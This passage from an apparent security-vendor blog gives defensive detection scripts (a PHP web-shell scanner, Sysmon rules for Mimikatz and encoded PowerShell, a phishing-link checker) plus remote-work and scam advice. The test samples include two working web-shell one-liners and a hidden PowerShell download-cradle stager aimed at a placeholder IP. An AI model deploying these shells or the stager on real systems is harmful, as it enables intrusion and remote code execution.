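     re.compile(r"\b(?:eval|assert)\s*\(\s*" + OBFUSCATORS + r"\s*\(", re.I), 4),
    # a very long base64 literal is itself a sign of an embedded payload
    ("long_base64_literal",
     re.compile(r"['\"][A-Za-z0-9+/]{100,}={0,2}['\"]"), 3),
    # an execution function on its own is only weak evidence (cron jobs, status pages)
    ("exec_function_present",
     re.compile(r"\b" + EXEC_FUNCS + r"\s*\(", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 4


def score_php(source):
    """Return (score, [names of rules that fired]) for one PHP source string."""
    hits = [name for name, rx, _ in RULES if rx.search(source)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def scan_files(files, threshold=SUSPICIOUS_THRESHOLD):
    """files: {path: source}. Return {path: (score, hits)} for every file at or
    above threshold, highest score first."""
    flagged = {}
    for path, src in files.items():
        score, hits = score_php(src)
        if score >= threshold:
            flagged[path] = (score, hits)
    return dict(sorted(flagged.items(), key=lambda kv: -kv[1][0]))


# Constructed sample "web root": two shells, two legitimate scripts.
SAMPLE_FILES = {
    "uploads/shell.php":
        "<?php if (isset($_REQUEST['cmd'])) { echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?>",
    "images/thumb.php":
        "<?php @eval(base64_decode($_POST['z'])); ?>",
    "admin/status.php":
        "<?php $out = shell_exec('/usr/bin/uptime'); echo htmlspecialchars($out); ?>",
    "contact.php":
        "<?php $name = htmlspecialchars($_POST['name']); mail('ops@example.com', 'Contact', $name); ?>",
}

if __name__ == "__main__":
    for path, (score, hits) in scan_files(SAMPLE_FILES).items():
        print(f"{score:>3}  {path}  {', '.join(hits)}")
```

Run against a real document root, feed each file’s contents into `scan_files`; the status page scores only 1 (an execution function with a constant argument) and stays below the threshold, while both shells score well above it. Treat the output as a triage list, not a verdict: a match still needs a human to read the file and check its upload time against web server logs.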

Mimikatz

Mimikatz is a leading post-exploitation tool that dumps plaintext passwords, password hashes, PINs and Kerberos tickets from memory. It also enables attacks such as pass-the-hash, pass-the-ticket and forging Kerberos Golden Tickets. This makes post-exploitation lateral movement within a network easy for attackers. Source

PowerShell Empire

PowerShell Empire is a unique attack framework in that its capabilities and behaviors closely resemble those used by current nation-state advanced persistent threat actors.

Nation-state hacking groups were using PowerShell to create fileless malware that runs in a computer’s memory without leaving traces on disk, and using PowerShell scripts as a post-exploitation vector for moving through networks and inside workstations, often without triggering security alerts.

Because PowerShell is installed by default on Windows 7 and later, at the time it was trusted by most security products, many of which did not detect PowerShell-based attacks.

Empire’s use among cybercriminals has grown so much in the past few years that in late 2018, the UK’s National Cyber Security Center included Empire on its shortlist of the five most dangerous publicly available hacking tools — together with JBiFrost, Mimikatz, China Chopper, and HTran. Source
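Both tools above leave behaviour an endpoint sensor can see even when the binary is renamed: Mimikatz has to open lsass.exe with read access to dump credentials, and an Empire stager is launched as a hidden, encoded PowerShell command whose decoded body contains a download cradle. The detector below is an added example, not Cybriant’s MDR tooling and not from the NCSC report, written over Sysmon-style events (ID 10 ProcessAccess and ID 1 ProcessCreate). The events, file paths, allowlist and stager text are all constructed; the access-mask value, switch abbreviations and cradle strings are the commonly documented ones but should be treated as assumptions to tune per environment.

```python
"""Two endpoint detections over Sysmon-style telemetry (added example, constructed input)."""
import base64
import binascii

PROCESS_VM_READ = 0x0010          # access right needed to read another process's memory
# Processes legitimately allowed to read LSASS memory (assumed allowlist; tune per estate).
LSASS_READERS_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}
# Strings typical of a PowerShell download cradle / in-memory execution.
CRADLE_MARKERS = ("iex", "invoke-expression", "net.webclient", "downloadstring",
                  "downloadfile", "frombase64string")


def _is_switch(token, full):
    """PowerShell accepts any unambiguous prefix of a switch, so -e, -ec and -enc
    all mean -EncodedCommand. Case-insensitive; needs at least one letter."""
    t = token.lower()
    return t.startswith("-") and len(t) >= 2 and full.startswith(t)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for tok, nxt in zip(tokens, tokens[1:]):
        if _is_switch(tok, "-encodedcommand"):
            try:
                return base64.b64decode(nxt, validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def lsass_access_alert(ev):
    """Rule 1: a non-allowlisted process granted VM_READ on lsass.exe (Sysmon ID 10)."""
    if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    if not int(ev["GrantedAccess"], 16) & PROCESS_VM_READ:
        return None
    if ev["SourceImage"].lower() in LSASS_READERS_ALLOWLIST:
        return None
    return {"rule": "mimikatz_lsass_access", "process": ev["SourceImage"],
            "granted_access": ev["GrantedAccess"]}


def encoded_powershell_alert(ev):
    """Rule 2: powershell.exe started with an encoded command that is hidden or
    contains a download cradle (Sysmon ID 1)."""
    if ev.get("EventID") != 1 or not ev["Image"].lower().endswith("powershell.exe"):
        return None
    tokens = ev["CommandLine"].split()
    hidden = any(_is_switch(a, "-windowstyle") and b.lower() in ("hidden", "1")
                 for a, b in zip(tokens, tokens[1:]))
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is None:
        return None
    markers = [m for m in CRADLE_MARKERS if m in decoded.lower()]
    if not markers and not hidden:
        return None
    return {"rule": "empire_encoded_powershell", "hidden_window": hidden,
            "markers": markers, "decoded": decoded}


def detect(events):
    """Run both rules over a list of events; return alerts in event order."""
    alerts = []
    for ev in events:
        for rule in (lsass_access_alert, encoded_powershell_alert):
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


# --- constructed sample telemetry (not real captures) -------------------------
STAGER_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/index.asp')"
STAGER_B64 = base64.b64encode(STAGER_PLAINTEXT.encode("utf-16le")).decode("ascii")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # Defender reading LSASS: expected, allowlisted.
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    # Unknown binary in a temp directory reading LSASS with 0x1010 (QUERY_LIMITED | VM_READ).
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Ordinary admin PowerShell: no encoded payload, not hidden.
    {"EventID": 1, "Image": PS_PATH, "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service"'},
    # Empire-style launcher: no profile, hidden window, encoded download cradle.
    {"EventID": 1, "Image": PS_PATH, "CommandLine": f"powershell.exe -noP -sta -w 1 -enc {STAGER_B64}"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The LSASS rule keys on the access mask rather than the source file name because the attacker controls the name; the PowerShell rule decodes the payload rather than matching the base64 because the same stager encodes differently every time. Expect the allowlist to need additions (backup agents, some EDR products) before the first rule is quiet enough to page on.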

C2 Obfuscation Tools

Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools (e.g., Tor) or more specific tools to obfuscate their location.

HUC Packet Transmitter (HTran) is a proxy tool used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009.

HTran facilitates TCP connections between the victim and a hop point controlled by a threat actor. Malicious threat actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network. Source

How to Protect Mobile Devices for Remote Workers

For a comprehensive mobile device protection strategy, you need a tool or service for endpoints that offers a form of antivirus, an EDR-type capability that records telemetry for later forensics, and vulnerability management for mobile.

Your mobile device security strategy should provide phishing protection for:
– Email
– SMS
– Social Media
– Messaging Apps

You should also consider Mobile Threat Defense that defends against:
– Application Threats
– Device Threats
– Network Threats

Managed Detection and Remediation (MDR) for Endpoint Security

Not only does MDR from Cybriant help reduce the time between breach and detection, we can also help stop the threat before it can fully execute.

Our experts utilize a static AI engine to provide pre-threat execution protection. The static AI engine replaces traditional signatures and obviates recurring scans that kill end-user productivity.

By tracking all processes, our team is able to detect malicious activities, and use behavioral AI technology to respond at top speed. We can detect and stop file-based malware, scripts, weaponized documents, lateral movement, file-less malware, and even zero-days.

As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant threats or trojans that evade network and endpoint detection solutions. Our MDR solution combines the talents of our experienced team with next-generation antivirus and EDR tools that utilize AI.

The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats.

Security Fundamentals for Working Remotely

Consider sharing the following guidance from InfraGard with all your remote workers. Stay up to date on coronavirus scams here.

Cyber Risks/Criminals: The FBI reports scammers are leveraging the COVID-19 pandemic to steal your money, your personal information, or both. Protect yourself and do your research before clicking on links purporting to provide information on the virus; donating to a charity online or through social media; contributing to a crowdfunding campaign; purchasing products online; or giving up your personal information to receive money or other benefits.

The FBI advises you to be on the lookout for the following:

FAKE CDC EMAILS – Watch out for emails claiming to be from the Centers for Disease Control and Prevention (CDC) or other organizations claiming to offer information on the virus. Do not click links or open attachments you do not recognize. Fraudsters can use links in emails to deliver malware to your computer to steal personal information or to lock your computer and demand payment. Be wary of websites and apps claiming to track COVID-19 cases worldwide. Criminals are using malicious websites to infect and lock devices until payment is received.

PHISHING EMAILS – Look out for phishing emails asking you to verify your personal information to receive an economic stimulus check from the government. While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information to send you money. Phishing emails may also claim to be related to charitable contributions, general financial relief, airline carrier refunds, fake cures and vaccines, and fake testing kits.

COUNTERFEIT TREATMENTS OR EQUIPMENT – Be cautious of anyone selling products that claim to prevent, treat, diagnose, or cure COVID-19. Be alert to counterfeit products such as sanitizing products and Personal Protective Equipment (PPE), including N95 respirator masks, goggles, full face shields, protective gowns, and gloves. More information on unapproved or counterfeit PPE can be found at www.cdc.gov/niosh. You can also find information on the U.S. Food and Drug Administration website, www.fda.gov, and the Environmental Protection Agency website, www.epa.gov. Report counterfeit products at www.ic3.gov and to the National Intellectual Property Rights Coordination website at iprcenter.gov.

Best Practices for Companies: Attached is a one-page document, developed by InfraGard National Board Director Rusty Sailors and his company, listing best cyber practices for companies to adopt, to ensure their information is kept safe and secure at all times.

In addition to those recommendations, the FBI is reminding people to always use good cyber hygiene and security measures. By remembering the following tips, you can protect yourself and help stop criminal activity:

  • Do not open attachments or click links within emails from senders you don’t recognize.
  • Do not provide your username, password, date of birth, social security number, financial data, or other personal information in response to an email or robocall.
  • Always verify the web address of legitimate websites and manually type them into your browser.
  • Check for misspellings or wrong domains within a link (for example, an address that should end in “.gov” ends in “.com” instead).
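The last tip above and the earlier point about the mobile UI hiding a link’s real destination come down to the same check: compare where a link says it goes with where it actually goes. The script below does that “hover” in code, the way a mail gateway or an awareness tool might. It is an added example written for this page, not the FBI’s or Cybriant’s code; the email body, the hosts in it and the expected “.gov” suffix are all constructed, and the suffix is an assumption the caller supplies based on who the message claims to be from.

```python
"""Flag deceptive links in an HTML email body (added example, constructed input)."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Link text that itself looks like a domain or URL, e.g. "www.irs.gov".
DOMAIN_LIKE = re.compile(r"(?:https?://)?[\w.-]+\.[A-Za-z]{2,}(?:/\S*)?")


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(value):
    """Lower-cased host of a URL or bare domain ('' if none)."""
    if "://" not in value:
        value = "http://" + value
    return (urlparse(value).hostname or "").lower()


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_link(href, text, expected_suffix=".gov"):
    """Return the reasons a link looks deceptive (empty list = nothing found).
    expected_suffix is the TLD the sender claims to be from (assumption)."""
    reasons = []
    real = host_of(href)
    shown = host_of(text) if DOMAIN_LIKE.fullmatch(text) else ""
    if not real:
        return ["no host in href"]
    if real.startswith("xn--") or ".xn--" in real:
        reasons.append("punycode (IDN) host, possible lookalike characters")
    if _is_ip(real):
        reasons.append("raw IP address instead of a domain")
    if shown and shown != real and not real.endswith("." + shown):
        reasons.append(f"text says {shown} but link goes to {real}")
    # The FBI check: "gov" sits inside the name, but the address does not end in .gov
    label = re.escape(expected_suffix.lstrip("."))
    if not real.endswith(expected_suffix) and re.search(rf"(^|[.-]){label}(?=[.-])", real):
        reasons.append(f"looks like {expected_suffix} but the real domain ends in ."
                       + real.rsplit(".", 1)[-1])
    return reasons


def scan_email(html, expected_suffix=".gov"):
    """Return [(href, text, reasons)] for every link in html that raised a reason."""
    parser = _LinkCollector()
    parser.feed(html)
    out = []
    for href, text in parser.links:
        reasons = check_link(href, text, expected_suffix)
        if reasons:
            out.append((href, text, reasons))
    return out


# Constructed sample message: one genuine link and three deceptive ones.
SAMPLE_EMAIL = """
<html><body>
<p>Check the latest guidance at <a href="https://www.cdc.gov/coronavirus">www.cdc.gov</a>.</p>
<p>To receive your stimulus check, verify your details at
<a href="http://www.irs.gov.com/verify">www.irs.gov</a> today.</p>
<p>Live case tracker: <a href="http://203.0.113.7/map.exe">Download the map</a></p>
<p>WHO update: <a href="http://xn--wh-oia.int/update">who.int</a></p>
</body></html>
"""

if __name__ == "__main__":
    for href, text, reasons in scan_email(SAMPLE_EMAIL):
        print(f"{text!r} -> {href}: {'; '.join(reasons)}")
```

The CDC link passes: its text and destination agree and it really ends in .gov. The stimulus link fails twice (text says www.irs.gov but the destination is www.irs.gov.com, whose real TLD is .com), the tracker points at a bare IP address, and the WHO link goes to a punycode host that is not who.int at all. On a phone none of this is visible without long-pressing the link, which is exactly why the check belongs in tooling rather than in the user.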

As organizations around the world move to remote work, we’re here to provide guidance and stability during these trying times.

Whether provisioning corporate laptops or allowing employees to use personal devices, hastily extending a remote work option can leave your organization vulnerable in terms of security.

Here are a few items to consider:

Remote Basics
– A computer
– A secure internet connection
– Chat and conferencing applications
– A dedicated workspace
– A phone and a camera
– Self-motivation and discipline
– A strict routine

Require VPN access for internal networks
A VPN encrypts traffic between the remote machine and the corporate network, so eavesdroppers on home or public Wi-Fi cannot read or tamper with it.

Update Password Policies
Make sure your employees understand and comply with your password policies. This might be the best time to start with new strong passwords across the company.

Separate User Account
If your staff are using their own devices, require a new user account to be set up for work use only. This separation helps both privacy and security.

Invest in full-featured endpoint security for home workers
Home systems are varied and, more often than not, are not up to the job of protecting your company’s assets. The best option is still business-class endpoint security that your IT team can manage and that includes a firewall and protection from malicious websites and malware.

Require multi-factor authentication
Multi-factor authentication is your best defense against cyber criminals who use brute-force techniques or stolen credentials.

Require encryption
If employees are working on sensitive files or downloading files to their personal devices, provide an encryption solution while requiring separation of personal files.

Keep machines up to date
It is difficult to know how well employees keep their home machines up to date. Enable automatic updates on all of their systems so they stay current with security patches.

Employee Training
COVID-19 scams are on the rise and are becoming more sophisticated. Remote workers’ habits can become lax when it comes to clicking on links. Provide a refresher to counter the human element that cybercriminals attempt to exploit. Consider running a phishing simulation and a training course before employees begin working remotely or shortly thereafter.

Free Offer: MDR Access